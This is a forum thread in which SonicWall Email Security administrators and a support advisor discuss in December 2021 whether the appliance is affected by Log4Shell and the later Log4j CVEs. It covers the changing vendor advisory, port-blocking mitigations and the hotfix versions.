ES vulnerable to Log4Shell?
BWC
Cybersecurity Overlord ✭✭✭
Hi,
considering the fact the Email Security is using Log4j2 2.11.2 I'am asking myself the question if the system is vulnerable to CVE-2021-044228 aka Log4Shell?
@David W or @Gailand do you have more insight because it should be checked at SNWL by now?
--Michael@BWC
Category: Email Security Appliances
1
Answers
@BWC We can check with engineering but keep in mind that in most cases we cannot comment unless it's in release notes.
Can you open a case for that and I can have Gailand follow up.
David Wilbur
Technical Support Senior Advisor, Premier Services , SME Email Security
According to the latest information on PSIRT, ES 10.x is not affected:
But the conclusion looks a bit strange to me, because "Apache Log4j project disclosed CVE-2021-44228, which is a Critical (CVSS 10.0) remote code execution vulnerability affecting Apache Log4j2 version<= 2.14.1. A subsequent security patch was released on Dec 10, 2021." and according to the Status information on a current ES 10.0.11 deployment it states Log4j2 2.11.2 as component in the about.html.
I hope for the best and forward the PSIRT to my clients.
--Michael@BWC
Is this a bad joke? PSIRT changed it's mind to
After review, version 10.x appears to be impacted by CVE-2021-44228. SonicWall is reading a HotFix to remediate the issue, which will be released shortly.
Thankfully I did not forwarded the false information to my customers because it seems my suspicion was right.
One aspect which is still fuzzy, at least to me, is it only exploitable via HTTP/S or is SMTP a vector as well? Is it possible to send one of these JNDI strings in the SMTP dialog and have this logged and parsed?
--Michael@BWC
Use ESA here. Would like to know too.
Maybe ESA is using it on some where not https.
We have ran tenable scan on https port which return no result. Also tested simple POC curl cmd with https://log4shell.huntress.com/
Result still negative. Not sure why they switch the content, maybe it only affected on certain condition.
My hunch was correct, SMTP is an option (shown below for Apache James), great, so any customer is at (potential) risk, even those not publishing HTTP/S. No word from SNWL so far, radio silence on my Engineering Ticket.
--Michael@BWC
Everyone please remember that there will be no official comment to this issue here in the community due to this being a vulnerability.
Also there will most likely be nothing on your Jira BWC until there is a formal announcement.
We do not use Apache for SMTP either.
The SMTP engine is our own coded product.
David Wilbur
Technical Support Senior Advisor, Premier Services , SME Email Security
@David W I know it's the code from MailFrontier, but if this code is using log4j, aren't we back at square one?
Apache James was just an example that it is not HTTP/S only, any service can be at risk.
--Michael@BWC
The SMTP code does not use anything from Apache.
Please be watching the page for any updates on this issue.
You will see updates to it throughout the day.
David Wilbur
Technical Support Senior Advisor, Premier Services , SME Email Security
Any update on this? I've seen no updates "throughout the day..." Asking for a friend.🙄
Hi,
jeah, a friend of mine is also very interested 🤨. Is there any update on this topic?
KR, Chris
@tbrame @C_Z you can't expect fast and accurate information of another CVSS 10 these days 😪, I'am sure behind the scenes SNWL is working hard on this, but as usual not very communicative to the outside.
Friends don't let Friends hanging in the dark.
--Michael@BWC
@BWC: It would calming me down to know if it's enough to disable all access except the smtp port. That's what we have done.
@C_Z I feel you and this is what I expected from a vendor in the first place. If blocking HTTP/S is the one and only needed mitigation until a fix is available everything would be somewhat fine. But not knowing if the essential SMTP service is at risk causes some anxiety.
But this might be corporate policy, in retrospect 2021 was not a good year in ramping up the communication. SMA, just sayin.
--Michael@BWC
SWL seems quick to put a marketing slick for the event, time to clean up there own side of the street though. Totally agree, at least let us know if SMTP service is at risk or not.
@David W Can you please give an advise or talk to your management immediately that this is not an appropriate way to handle a security incident of this dimension. It's a CVSS of 10.0!
We need advise because your (SNWL) system is a main and critical part of our infra. Beeing vulnerable here is not a small mather. Our companies trust in SNWL and SNWL damages its reputation and gambles away trust. Every single other company has managed to publish an advice for mitigation in the last 24h - not SNWL.
Btw. what do you mean with "shortly" in this advisory? https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032
KR, Chris
Yes, agree with @C_Z here. We need to know if the SMTP is vulnerable to exploitation. I've closed off everything but ports 25 and 587 and I've even tried testing the SMTP with Huntress Log4Shell tester and come up with nothing, but I'm not a sophisticated hacker to be able to really know for sure.
A comment from SW about whether the SMTP is vulnerable to exploitation would be most useful here. Otherwise, those of us who use ESA are without any peace of mind.
Looks like a patch was just posted for this. Good luck and stay safe!
And maybe another patch will be necessary, we'll see.
Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released (thehackernews.com)
--Michael@BWC
@BWC , I was about to update the firmware for ES 5000 and you just dropped this news. I guess I will hold a little longer.
And, hoping SMTP/IMAP/POP3 is not the vulnerable.
I am following you since DEC 10 BTW. Thanks for sharing the updates.
DT_AI
@BWC Yes, it's not good but not so bad either (CVSS 3.7). I'm wondering SNWL is doing so bad with communication. It's like back in the 80's/90's: security by obscurity. I'm feeling old now and it would be nice if SNWL management would arrive in this century with a appropriate communication for IT professionals.
@David W Is there now any information on which services were affected?
I applied the latest patch to my ESA and so far, nothing has changed (that's a good thing). Hoping the new vulnerability just discovered doesn't affect the current patch.
It is proved that HTTPS is vulnerable to RCE on 10.0.11.
10.0.12 already fixed the HTTPS issue.
The new vulnerability is not a critical one, dont think they will and it need immediate patch.
Applied the latest patch on ES 5000 and seems working good so far.
Even a CVSS 3.7 which could lead to "just" a DoS attack should be fixed ASAP, at least in my opinion. log4j 2.16 is available and 2.15 is incomplete, doesn't sound that hard to do. Customers are not that happy seeing their SMTP gateways at any (avoidable) risk.
No word from SNWL if they removed the JndiLookup Class manually, which would be another mitigation.
--Michael@BWC
CVE-2021-45046 got a bump from 3.7 to 9.0 ... still ignoring?
--Michael@BWC
Well, it keeps on coming, CVE-2021-45105 is the new member of the log4j debacle, CVSS 7.5 (High).
It seems another patch with log4j 2.16 is coming, according to PSIRT, but this will not cover the above. 2.17 is the recommended version (by now).
I already added this to my Engineering Ticket, but I'am sure SNWL is aware already.
--Michael@BWC
Maybe the next update for on-premise deployments is near, at least HES got another update to 10.0.13.7219.
This is all speculation, because as usual there is no specific information from SNWL.
--Michael@BWC
they have updated the advisory.
A new ES HotFix is undergoing testing to include 2.17.0 to address CVE-2021-45046 and CVE-2021-45105. Customers should expect to receive direct communication regarding firmware upgrades, and the planned release including log4j 2.17.0 is tentatively set for 22-DEC-2021.
I got an e-mail telling me to immediately upgrade to 10.0.13 but it's not showing as available...